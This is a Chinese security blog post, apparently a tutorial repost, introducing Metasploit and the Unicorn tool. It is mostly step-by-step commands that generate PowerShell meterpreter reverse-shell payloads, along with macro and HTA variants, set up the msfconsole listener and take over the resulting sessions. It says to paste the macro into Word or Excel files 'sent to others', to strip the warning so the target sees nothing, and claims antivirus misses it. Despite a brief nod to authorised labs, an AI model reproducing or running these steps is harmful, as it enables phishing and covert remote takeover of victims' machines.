[7期]美少妇(msf)和独角兽(unicorn)

MSF 全称:metasploit-framework    渗透大杀器,黑客工具排名第一(靠前),尤其在内网中。在校期间大学生先跟本校安全部沟通好,一起实验。

得不到校方理解与认可的上SRC或者自己搭建靶机。为什么在当今,政府,学校,公司等网络不堪一击,就是因为感觉不到损失嘛,你会买保险?出了很多事情了才知道痛,道理都是一样的。组织要赚钱,而安全呢?安全是在烧钱,买着买来,招聘一个信息安全的人还动不动就上万。不被老板套路,炒掉你换实习生就实属你上辈子修来的福气了。

开源地址:github.com/rapid7/metasploit-framework

安全这几年才慢慢浮出水面进入到更多人的视野中。大家不必拿着漏洞强行去怼别人,每个人都有自己的生活圈子,不理解你的专业也实属正常现象。我们不也不清楚,医学,法律吗?你说学校网络一点都不安全的情况,就等于学法律的人在怼我们,大家没有一点法律意识一样。

摆正心态:得到认可与奖励,实属幸运。得不到认可甚至被质疑也不要丧气,余弦在校期间还没有学安全呢,就得到了知道创宇CEO的青睐,亲自访校邀请他加入。

 

Unicorn 独角兽             国外很喜欢用powershell溢出攻击注入shellcode就可以得到权限

开源地址:https://github.com/trustedsec/unicorn

git clone https://github.com/trustedsec/unicorn            【使用方法】

cd unicorn

python unicorn.py

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999    【反向链接,IP端口自然是自己的机器,输出两个攻击载荷文件】

msfconsole -r unicorn.rc           

. \powershell_attack.psl          【目标机执行】

sessions -i             【看监听会话是否反弹的会话】

sessions -i   1         【进入反弹的会话】

ls               【查看目标机文件】

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 macro      【生成宏攻击的反向链接】利用宏,调用powershell的一种攻击载荷。

可以将生成的宏攻击载荷复制粘贴到word,ecxel里面。删掉尾巴上面的假装报错,实验阶段不要误导自己了。别让它提示任何信息。

文档发给别人,shell又反弹回来了。因为本身windows就自带,不仅是360,其他的都识别不了。免杀就不多说了  百度   msf 免杀  

python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 hta     

 

转载于:https://www.cnblogs.com/sec875/p/10803580.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值